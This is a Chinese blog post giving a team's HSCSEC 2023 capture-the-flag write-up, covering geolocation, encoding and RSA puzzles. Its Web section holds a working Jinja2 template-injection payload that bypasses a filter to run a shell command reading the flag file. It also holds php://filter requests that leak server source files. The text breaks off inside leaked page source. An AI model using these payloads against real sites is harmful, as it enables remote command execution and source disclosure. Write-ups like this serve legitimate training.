<!DOCTYPE html>


<html lang="zh-CN">
  

    <head>
      <meta charset="utf-8" />
        
      <meta
        name="viewport"
        content="width=device-width, initial-scale=1, maximum-scale=1"
      />
      <title>HSCSEC-红客突击队-2023 |  CTF</title>
  <meta name="generator" content="hexo-theme-ayer">
      
      <link rel="shortcut icon" href="/favicon.ico" />
       
<link rel="stylesheet" href="/dist/main.css">

      
<link rel="stylesheet" href="/css/fonts/remixicon.css">

      
<link rel="stylesheet" href="/css/custom.css">
 
      <script src="https://cdn.staticfile.org/pace/1.2.4/pace.min.js"></script>
       
 

      <link
        rel="stylesheet"
        href="https://cdn.jsdelivr.net/npm/@sweetalert2/theme-bulma@5.0.1/bulma.min.css"
      />
      <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.0.19/dist/sweetalert2.min.js"></script>

      <!-- mermaid -->
      
      <style>
        .swal2-styled.swal2-confirm {
          font-size: 1.6rem;
        }
      </style>
    </head>
  </html>
</html>


<body>
  <div id="app">
    
      
      <canvas width="1777" height="841"
        style="position: fixed; left: 0px; top: 0px; z-index: 99999; pointer-events: none;"></canvas>
      
    <main class="content on">
      <section class="outer">
  <article
  id="post-HSCSEC-红客突击队-2023"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  HSCSEC-红客突击队-2023
</h1>
 

      
    </header>
     
    <div class="article-meta">
      <a href="/2023/02/13/HSCSEC-%E7%BA%A2%E5%AE%A2%E7%AA%81%E5%87%BB%E9%98%9F-2023/" class="article-date">
  <time datetime="2023-02-13T06:32:52.000Z" itemprop="datePublished">2023-02-13</time>
</a> 
  <div class="article-category">
    <a class="article-category-link" href="/categories/match/">match</a>
  </div>
  
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> 字数统计:</span>
            <span class="post-count">2.4k</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> 阅读时长≈</span>
            <span class="post-count">12 分钟</span>
        </span>
    </span>
</div>
 
    </div>
      
    <div class="tocbot"></div>




  
    <div class="article-entry" itemprop="articleBody">
       
  <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">2023/02/11 00:00 UTC+8 - 2023/02/12 23:59 UTC+8</span><br><span class="line"></span><br><span class="line">本届HSC-2th 2023是由中龙技术联合社会战队红客突击队（HSCSEC）举办。 本次比赛将采用在线网络安全夺旗挑战赛的形式，涵盖web,crypto,misc,reverse,pwn等主流方向，并面向全球开放。</span><br><span class="line"></span><br><span class="line">Rank: 31</span><br></pre></td></tr></table></figure>



<h1 id="Social-Engineering"><a href="#Social-Engineering" class="headerlink" title="Social Engineering"></a>Social Engineering</h1><h2 id="Happy-Lantern-Festival"><a href="#Happy-Lantern-Festival" class="headerlink" title="Happy Lantern Festival"></a>Happy Lantern Festival</h2><p>百度搜索阿勒泰市第十三届元宵灯会</p>
<p><img src="/2023/02/13/HSCSEC-%E7%BA%A2%E5%AE%A2%E7%AA%81%E5%87%BB%E9%98%9F-2023/image-20230211112151940.png" alt="image-20230211112151940"></p>
<p>在阿勒泰市五百里风情街举办</p>
<p><img src="/2023/02/13/HSCSEC-%E7%BA%A2%E5%AE%A2%E7%AA%81%E5%87%BB%E9%98%9F-2023/image-20230211112308268.png" alt="image-20230211112308268"></p>
<p><img src="/2023/02/13/HSCSEC-%E7%BA%A2%E5%AE%A2%E7%AA%81%E5%87%BB%E9%98%9F-2023/image-20230211113109127.png" alt="image-20230211113109127"></p>
<p>所以HSCSEC{新疆维吾尔自治区阿勒泰地区阿勒泰市五百里风情街}</p>
<h2 id="Boat"><a href="#Boat" class="headerlink" title="Boat"></a>Boat</h2><p><img src="/2023/02/13/HSCSEC-%E7%BA%A2%E5%AE%A2%E7%AA%81%E5%87%BB%E9%98%9F-2023/boat.png" alt="boat"></p>
<p>通过百度搜索得到这是在西湖拍的照片</p>
<p>然后搜索西湖的具体位置</p>
<p><img src="/2023/02/13/HSCSEC-%E7%BA%A2%E5%AE%A2%E7%AA%81%E5%87%BB%E9%98%9F-2023/image-20230211114001758.png" alt="image-20230211204617988"></p>
<p>HSCSEC{浙江省杭州市西湖区龙井路1号}</p>
<h2 id="Apple-Store"><a href="#Apple-Store" class="headerlink" title="Apple Store"></a>Apple Store</h2><p>通过百度识图得</p>
<p><img src="/2023/02/13/HSCSEC-%E7%BA%A2%E5%AE%A2%E7%AA%81%E5%87%BB%E9%98%9F-2023/image-20230212112221530.png" alt="image-20230212112221530"></p>
<p>然后搜索西单大悦城</p>
<p><img src="/2023/02/13/HSCSEC-%E7%BA%A2%E5%AE%A2%E7%AA%81%E5%87%BB%E9%98%9F-2023/image-20230212112321745.png" alt="image-20230212112321745"></p>
<p>HSCSEC{北京市西城区西单北大街131号}</p>
<h2 id="Airplane"><a href="#Airplane" class="headerlink" title="Airplane"></a>Airplane</h2><p><img src="/2023/02/13/HSCSEC-%E7%BA%A2%E5%AE%A2%E7%AA%81%E5%87%BB%E9%98%9F-2023/image-20230212112540058.png" alt="image-20230212112540058"></p>
<p>可以隐约看到风机型号应该是B-30EL百度</p>
<p><img src="/2023/02/13/HSCSEC-%E7%BA%A2%E5%AE%A2%E7%AA%81%E5%87%BB%E9%98%9F-2023/image-20230212113106096.png" alt="image-20230212113106096"></p>
<p>发现是渝兴线上的   重庆到北京大兴机场的</p>
<p><img src="/2023/02/13/HSCSEC-%E7%BA%A2%E5%AE%A2%E7%AA%81%E5%87%BB%E9%98%9F-2023/image-20230212113226575.png" alt="image-20230212113226575"></p>
<p>与飞机的俯瞰图有相同的地方</p>
<p>HSCSEC{北京市大兴区大兴国际机场}</p>
<h2 id="Beautiful-Park"><a href="#Beautiful-Park" class="headerlink" title="Beautiful Park"></a>Beautiful Park</h2><p><img src="/2023/02/13/HSCSEC-%E7%BA%A2%E5%AE%A2%E7%AA%81%E5%87%BB%E9%98%9F-2023/image-20230212113717456.png" alt="image-20230212113717456"></p>
<p><img src="/2023/02/13/HSCSEC-%E7%BA%A2%E5%AE%A2%E7%AA%81%E5%87%BB%E9%98%9F-2023/image-20230212113801024.png" alt="image-20230212113801024"></p>
<p>河北省张家口市怀来县的官厅水库国家湿地公园</p>
<p>HSCSEC{河北省张家口市怀来县官厅水库国家湿地公园}</p>
<h2 id="Tower"><a href="#Tower" class="headerlink" title="Tower"></a>Tower</h2><p><img src="/2023/02/13/HSCSEC-%E7%BA%A2%E5%AE%A2%E7%AA%81%E5%87%BB%E9%98%9F-2023/Tower.jpg" alt="Tower"></p>
<p>通过百度识图得这是澳门巴黎塔</p>
<p>然后高德搜索具体位置</p>
<p>HSCSEC{澳门特别行政区路氹填海区澳门路氹金光大道连贯公路澳门巴黎人}</p>
<h2 id="Beautiful-Lake"><a href="#Beautiful-Lake" class="headerlink" title="Beautiful Lake"></a>Beautiful Lake</h2><p><img src="/2023/02/13/HSCSEC-%E7%BA%A2%E5%AE%A2%E7%AA%81%E5%87%BB%E9%98%9F-2023/image-20230213142744556.png" alt="image-20230213142744556"></p>
<p>可以看到宁夏理工学院百度搜宁夏理工学院的湖的具体位置</p>
<p>HSCSEC{宁夏回族自治区石嘴山市大武口区星海湖}</p>
<h1 id="Ancient-MISC"><a href="#Ancient-MISC" class="headerlink" title="Ancient-MISC"></a>Ancient-MISC</h1><h2 id="Deduced-gossip"><a href="#Deduced-gossip" class="headerlink" title="Deduced gossip"></a>Deduced gossip</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#这应该是八卦图和一个空字组成的一种进制数  因为一共有九个符号所以应该是九进制的数</span></span><br><span class="line"><span class="comment">#☲☵这两个符号应该是H的ASCII码的值72，又因为九进制的80等于十进制的72，所以☲:8,☵:0</span></span><br><span class="line"><span class="comment">#☷☵☳这三个符号应该是S的ASCII码值83,又因为九进制的102等于十进制的83，所以☷:1,☳:2</span></span><br><span class="line"><span class="comment">#☶空这两个符号应该是C的ASCII码值67，又因为九进制的74等于十进制的67，所以☶:7,空:4</span></span><br><span class="line"><span class="comment">#☷空☱这三个符号应该是&#123;的ASCII码值123，又因为九进制的146等于十进制的123，所以☱:6</span></span><br><span class="line"><span class="comment">#还剩3和5 ☰ ☴ 要么 ☴:3 要么☴:5</span></span><br><span class="line">c=<span class="string">&#x27;☲☵ ☷☵☳ ☶空 ☷☵☳ ☶☱ ☶空 ☷空☱ ☶空 ☷☳☰ ☷☳☱ ☷☴☳ ☷☳☳ ☷☴☶ ☷☳☳ ☷☷☰ ☷☳空 ☰☴ ☷☴☶ ☷☴☶ ☷☴空 ☷空☲&#x27;</span></span><br><span class="line"><span class="built_in">dict</span>=&#123;<span class="string">&#x27;☵&#x27;</span>:<span class="string">&#x27;0&#x27;</span>,<span class="string">&#x27;☷&#x27;</span>:<span class="string">&#x27;1&#x27;</span>,<span class="string">&#x27;☳&#x27;</span>:<span class="string">&#x27;2&#x27;</span>,<span class="string">&#x27;☴&#x27;</span>:<span class="string">&#x27;3&#x27;</span>,<span class="string">&#x27;空&#x27;</span>:<span class="string">&#x27;4&#x27;</span>,<span class="string">&#x27;☰&#x27;</span>:<span class="string">&#x27;5&#x27;</span>,<span class="string">&#x27;☱&#x27;</span>:<span class="string">&#x27;6&#x27;</span>,<span class="string">&#x27;☶&#x27;</span>:<span class="string">&#x27;7&#x27;</span>,<span class="string">&#x27;☲&#x27;</span>:<span class="string">&#x27;8&#x27;</span>&#125;      <span class="comment">#正确的</span></span><br><span class="line"><span class="comment"># dict=&#123;&#x27;☵&#x27;:&#x27;0&#x27;,&#x27;☷&#x27;:&#x27;1&#x27;,&#x27;☳&#x27;:&#x27;2&#x27;,&#x27;☰&#x27;:&#x27;3&#x27;,&#x27;空&#x27;:&#x27;4&#x27;,&#x27;☴&#x27;:&#x27;5&#x27;,&#x27;☱&#x27;:&#x27;6&#x27;,&#x27;☶&#x27;:&#x27;7&#x27;,&#x27;☲&#x27;:&#x27;8&#x27;&#125;    #错误的</span></span><br><span class="line">c0=c.split(<span class="string">&#x27; &#x27;</span>)</span><br><span class="line">flag=<span class="string">&#x27;&#x27;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> c0:</span><br><span class="line">    m = <span class="string">&#x27;&#x27;</span></span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> i:</span><br><span class="line">        m += <span class="built_in">dict</span>.get(j)</span><br><span class="line">    <span class="built_in">print</span>(<span class="built_in">chr</span>(<span class="built_in">int</span>(m,<span class="number">9</span>)),end=<span class="string">&#x27;&#x27;</span>)</span><br><span class="line"><span class="comment">#HSCSEC&#123;Chinese_g0ssp&#125;  发现少个i手动加上   HSCSEC&#123;Chinese_g0ssip&#125;</span></span><br></pre></td></tr></table></figure>





<h2 id="Watch-the-sky-at-night"><a href="#Watch-the-sky-at-night" class="headerlink" title="Watch the sky at night"></a>Watch the sky at night</h2><p>通过搜索得到二十八星宿，又分为青龙，白虎，朱雀，玄武四大类每一类可以看成相同的一个数字</p>
<p>则这四类可以组成一个四进制的数字</p>
<p><img src="/2023/02/13/HSCSEC-%E7%BA%A2%E5%AE%A2%E7%AA%81%E5%87%BB%E9%98%9F-2023/image-20230211220246475.png" alt="image-20230211220246475"></p>
<p>要把   壁水獝  改为   壁水貐</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">qinglong=<span class="string">&#x27;角木蛟 亢金龙 氐土貉 房日兔 心月狐 尾火虎 箕水豹&#x27;</span>.split(<span class="string">&#x27; &#x27;</span>)</span><br><span class="line">zuque=<span class="string">&#x27;井木犴 鬼金羊 柳土獐 星日马 张月鹿 翼火蛇 轸水蚓&#x27;</span>.split(<span class="string">&#x27; &#x27;</span>)</span><br><span class="line">xuanwu=<span class="string">&#x27;斗木獬 牛金牛 女土蝠 虚日鼠 危月燕 室火猪 壁水貐&#x27;</span>.split(<span class="string">&#x27; &#x27;</span>)</span><br><span class="line">baihu=<span class="string">&#x27;奎木狼 娄金狗 胃土雉 昴日鸡 毕月乌 觜火猴 参水猿&#x27;</span>.split(<span class="string">&#x27; &#x27;</span>)</span><br><span class="line">c=<span class="string">&#x27;&#x27;&#x27;斗木獬角木蛟奎木狼亢金龙 牛金牛女土蝠氐土貉井木犴</span></span><br><span class="line"><span class="string">虚日鼠房日兔心月狐鬼金羊 危月燕室火猪尾火虎柳土獐</span></span><br><span class="line"><span class="string">壁水貐箕水豹斗木獬牛金牛 女土蝠角木蛟亢金龙星日马</span></span><br><span class="line"><span class="string">虚日鼠张月鹿娄金狗翼火蛇 危月燕氐土貉房日兔轸水蚓</span></span><br><span class="line"><span class="string">室火猪心月狐井木犴胃土雉 壁水貐斗木獬鬼金羊柳土獐</span></span><br><span class="line"><span class="string">牛金牛尾火虎箕水豹女土蝠 虚日鼠昴日鸡柳土獐毕月乌</span></span><br><span class="line"><span class="string">危月燕觜火猴角木蛟星日马 室火猪参水猿奎木狼壁水貐</span></span><br><span class="line"><span class="string">斗木獬娄金狗牛金牛女土蝠 虚日鼠胃土雉张月鹿昴日鸡</span></span><br><span class="line"><span class="string">危月燕翼火蛇室火猪亢金龙 壁水貐斗木獬轸水蚓井木犴</span></span><br><span class="line"><span class="string">牛金牛氐土貉房日兔女土蝠 虚日鼠危月燕心月狐尾火虎</span></span><br><span class="line"><span class="string">室火猪鬼金羊柳土獐壁水貐&#x27;&#x27;&#x27;</span></span><br><span class="line">c0=c.split()</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> c0:</span><br><span class="line">    flag = <span class="string">&#x27;&#x27;</span></span><br><span class="line">    m = []</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">4</span>):</span><br><span class="line">        m.append(i[j*<span class="number">3</span>:j*<span class="number">3</span>+<span class="number">3</span>])</span><br><span class="line">    <span class="keyword">for</span> p <span class="keyword">in</span> m:     <span class="comment">#这里不知道谁代表0，1，2，3 利用枚举尝试看那种组合可以得到正确结果</span></span><br><span class="line">        <span class="keyword">if</span> p <span class="keyword">in</span> qinglong:</span><br><span class="line">            flag+=<span class="string">&#x27;0&#x27;</span></span><br><span class="line">        <span class="keyword">if</span> p <span class="keyword">in</span> zuque:</span><br><span class="line">            flag+=<span class="string">&#x27;3&#x27;</span></span><br><span class="line">        <span class="keyword">if</span> p <span class="keyword">in</span> xuanwu:</span><br><span class="line">            flag+=<span class="string">&#x27;1&#x27;</span></span><br><span class="line">        <span class="keyword">if</span> p <span class="keyword">in</span> baihu:</span><br><span class="line">            flag+=<span class="string">&#x27;2&#x27;</span></span><br><span class="line">    <span class="built_in">print</span>(<span class="built_in">chr</span>(<span class="built_in">int</span>(flag,<span class="number">4</span>)),end=<span class="string">&#x27;&#x27;</span>)</span><br><span class="line"><span class="comment">#HSCSEC&#123;CN_Ancient_AP&#125;</span></span><br></pre></td></tr></table></figure>



<h1 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h1><h2 id="EZRSA"><a href="#EZRSA" class="headerlink" title="EZRSA"></a>EZRSA</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># from Crypto.Util.number import *</span></span><br><span class="line"><span class="comment"># import gmpy2</span></span><br><span class="line"><span class="comment"># from flag import m</span></span><br><span class="line"><span class="comment">#</span></span><br><span class="line"><span class="comment"># p = getPrime(1024)</span></span><br><span class="line"><span class="comment"># q = getPrime(1024)</span></span><br><span class="line"><span class="comment"># n = p * q</span></span><br><span class="line"><span class="comment"># print(&#x27;n =&#x27;,n)</span></span><br><span class="line"><span class="comment"># e = 0x10001</span></span><br><span class="line"><span class="comment"># M = m * e * 1 * 2022 * p</span></span><br><span class="line"><span class="comment"># c = pow(M,e,n)</span></span><br><span class="line"><span class="comment"># print(&#x27;c =&#x27;,c)</span></span><br><span class="line"></span><br><span class="line">n = <span class="number">16266043783454053154037197753138388613864200794483663334493856481522764684650995230938142916968470804276539967429581472897698022852787399956166067156691430593337430691851251036378709799238876668312530223697905925939542713491015517460139150765778057817475571231361809654951289718071760502692960235551663466242938669673675870151921605230499603814070711617511206013584605131901906195136038060653121164252894949526861390984185085201067988694831398388037080993820517447099157891181179389949333832439004857436617834100885739716577641892686620423154860716308518151628754780994043553863224363539879909831811888663875989774849</span></span><br><span class="line">c = <span class="number">12716190507848578560760116589677996073721225715245215495257947887969923319693501568134141757778665747980229898129090929698368855086594836111461700857934476682700625486249555753323344759513528101651108919161794915999809784961533946922607642974500946026677116418317599095703217004064379100607278317877894742815660315660254853364776654303066021672567442581774299847661025422994141801987588151758971034155714424052693627277202951522779716696303237915400201362585413354036973117149974017434406560929491956957193491445847385625481870256240443170803497196783872213746269940877814806857222191433079944785910813364137603874411</span></span><br><span class="line">e = <span class="number">0x10001</span></span><br><span class="line"><span class="keyword">import</span> gmpy2</span><br><span class="line"><span class="keyword">import</span> libnum</span><br><span class="line"></span><br><span class="line">p=<span class="number">97772803605372749682605407399511947369112121674469942228369880617973442071629696563167801242512592723590571045910500244994517647412843880814748689241502769894657207751011999959509916975918486841422622984629059948050450554202252225537996289481828075394484142212703142883528182761865502541887744555480640923169</span></span><br><span class="line">q=n//p</span><br><span class="line">phi=(p-<span class="number">1</span>)*(q-<span class="number">1</span>)</span><br><span class="line">d=gmpy2.invert(e,phi)</span><br><span class="line">m=<span class="built_in">pow</span>(c,d,n)</span><br><span class="line"><span class="built_in">print</span>(libnum.n2s(<span class="built_in">int</span>(m//<span class="number">2022</span>//e//p)))</span><br><span class="line"><span class="comment">#flag&#123;3e5e2789a93a80615cc35edbff397c05&#125;</span></span><br></pre></td></tr></table></figure>



<h2 id="Operator"><a href="#Operator" class="headerlink" title="Operator"></a>Operator</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># #!/bin/python3</span></span><br><span class="line"><span class="comment"># from Crypto.Util.number import bytes_to_long, getPrime</span></span><br><span class="line"><span class="comment">#</span></span><br><span class="line"><span class="comment"># FLAG = &quot;*******************MASK****************&quot;</span></span><br><span class="line"><span class="comment">#</span></span><br><span class="line"><span class="comment"># # print(FLAG)</span></span><br><span class="line"><span class="comment"># number1 = getPrime(512)</span></span><br><span class="line"><span class="comment"># number2 = getPrime(1024)</span></span><br><span class="line"><span class="comment"># print(number1)</span></span><br><span class="line"><span class="comment"># result = FLAG * number1 % number2</span></span><br><span class="line"><span class="comment"># print(result)</span></span><br><span class="line"></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">Output:</span></span><br><span class="line"><span class="string">11488359375916816818731868252559119400126174593041608170883818546254791846479664455120194350355087017477744828351806157930199157462913063513512421460678471</span></span><br><span class="line"><span class="string">1890846045246997191702622225497063073251667816125412875121879991742654650976309481716690792328873189601779812108551290078049710826355501933349874438201643986975141068179879506727213209273645848165732801667704040761771</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="keyword">import</span> libnum</span><br><span class="line">number1=<span class="number">11488359375916816818731868252559119400126174593041608170883818546254791846479664455120194350355087017477744828351806157930199157462913063513512421460678471</span></span><br><span class="line">result=<span class="number">1890846045246997191702622225497063073251667816125412875121879991742654650976309481716690792328873189601779812108551290078049710826355501933349874438201643986975141068179879506727213209273645848165732801667704040761771</span></span><br><span class="line">m=result//number1</span><br><span class="line"><span class="built_in">print</span>(libnum.n2s(<span class="built_in">int</span>(m)))</span><br><span class="line"></span><br><span class="line"><span class="comment">#flag&#123;qMmZqWvmj70bBsCfmVLT&#125;</span></span><br></pre></td></tr></table></figure>



<h2 id="EZVC"><a href="#EZVC" class="headerlink" title="EZVC"></a>EZVC</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="comment"># import flag</span></span><br><span class="line"><span class="comment"># alphabet = &#x27;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!&quot;#$%&amp;\&#x27;()*+,-./:;&lt;=&gt;?@[\]^_`&#123;|&#125;~&#x27;</span></span><br><span class="line"><span class="comment"># key = &#x27;HSC&#x27;</span></span><br><span class="line"><span class="comment"># assert flag.startswith(&#x27;HSCSEC&#123;&#x27;)</span></span><br><span class="line"><span class="comment"># flag_num_list = []</span></span><br><span class="line"><span class="comment"># c = []</span></span><br><span class="line"><span class="comment"># for item in flag:</span></span><br><span class="line"><span class="comment">#     flag_num_list.append(alphabet.find(item) + 1)</span></span><br><span class="line"><span class="comment"># key_num = alphabet.find(key) + 1</span></span><br><span class="line"><span class="comment"># for i in flag_num_list:</span></span><br><span class="line"><span class="comment">#     m = (i + key_num) % 94 - 1</span></span><br><span class="line"><span class="comment">#     if m == 0:</span></span><br><span class="line"><span class="comment">#         c.append(&quot;□&quot;)</span></span><br><span class="line"><span class="comment">#     c.append(alphabet[m-1:m])</span></span><br><span class="line"><span class="comment"># print(&quot;c = &#123;&#125;&quot;.format(&#x27;&#x27;.join(c)))</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># c = GRBRDB`jg10ij2g01i,g201gi,2gi2,012igaigagi|</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">c = <span class="string">&#x27;GRBRDB`jg10ij2g01i,g201gi,2gi2,012igaigagi|&#x27;</span></span><br><span class="line">alphabet = <span class="string">&#x27;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!&quot;#$%&amp;\&#x27;()*+,-./:;&lt;=&gt;?@[\]^_`&#123;|&#125;~&#x27;</span></span><br><span class="line">key = <span class="string">&#x27;HSC&#x27;</span></span><br><span class="line">key_num = alphabet.find(key) + <span class="number">1</span></span><br><span class="line"><span class="built_in">print</span>(key_num)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> c:</span><br><span class="line">    m=alphabet.find(i) + <span class="number">1</span></span><br><span class="line">    <span class="built_in">print</span>(alphabet[m],end=<span class="string">&#x27;&#x27;</span>)</span><br><span class="line"><span class="comment">#HSCSEC&#123;kh21jk3h12j-h312hj-3hj3-123jhbjhbhj&#125;</span></span><br></pre></td></tr></table></figure>

<h1 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h1><h2 id="EZSSTI"><a href="#EZSSTI" class="headerlink" title="EZSSTI"></a>EZSSTI</h2><p><img src="/2023/02/13/HSCSEC-%E7%BA%A2%E5%AE%A2%E7%AA%81%E5%87%BB%E9%98%9F-2023/image-20230212132309050.png" alt="image-20230212132309050"></p>
<p>进行到这一步的时候发现页面中显示  说明把popen和flag给过滤了</p>
<p>popen可以利用字符拼接绕过  flag可以通过 sort  fl*实现绕过</p>
<p><img src="/2023/02/13/HSCSEC-%E7%BA%A2%E5%AE%A2%E7%AA%81%E5%87%BB%E9%98%9F-2023/image-20230212132617954.png" alt="image-20230212132617954"></p>
<p>最终payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/?name=&#123;&#123;&quot;&quot;.__class__.__base__.__subclasses__()[132].__init__.__globals__[&quot;pop&quot;&quot;en&quot;](&#x27;sort /fl*&#x27;).read()&#125;&#125;                             </span><br></pre></td></tr></table></figure>

<p>HSCSEC{9a288ab6-fd07-48e9-981c-9badd98ae5a9}</p>
<p>或者tplmap</p>
<p><img src="/2023/02/13/HSCSEC-%E7%BA%A2%E5%AE%A2%E7%AA%81%E5%87%BB%E9%98%9F-2023/image-20230213142355361.png" alt="image-20230213142355361"></p>
<h2 id="EASYPHY"><a href="#EASYPHY" class="headerlink" title="EASYPHY"></a>EASYPHY</h2><p>赛后看了大佬WP才看懂</p>
<p>首先就是利用php伪协议和base大小写绕过来</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?acti0n=php://filter/read=convert.bAse64-encode/resource=upload.php</span><br><span class="line">?acti0n=php://filter/read=convert.bAse64-encode/resource=view.php</span><br></pre></td></tr></table></figure>

<p>upload.php</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">html</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">link</span> <span class="attr">type</span> = <span class="string">&quot;text/css&quot;</span> <span class="attr">rel</span> = <span class="string">&quot;stylesheet&quot;</span> <span class="attr">href</span> = <span class="string">&quot;css/style.css&quot;</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span> <span class="attr">lang</span> = <span class="string">&quot;zh&quot;</span>&gt;</span></span><br><span 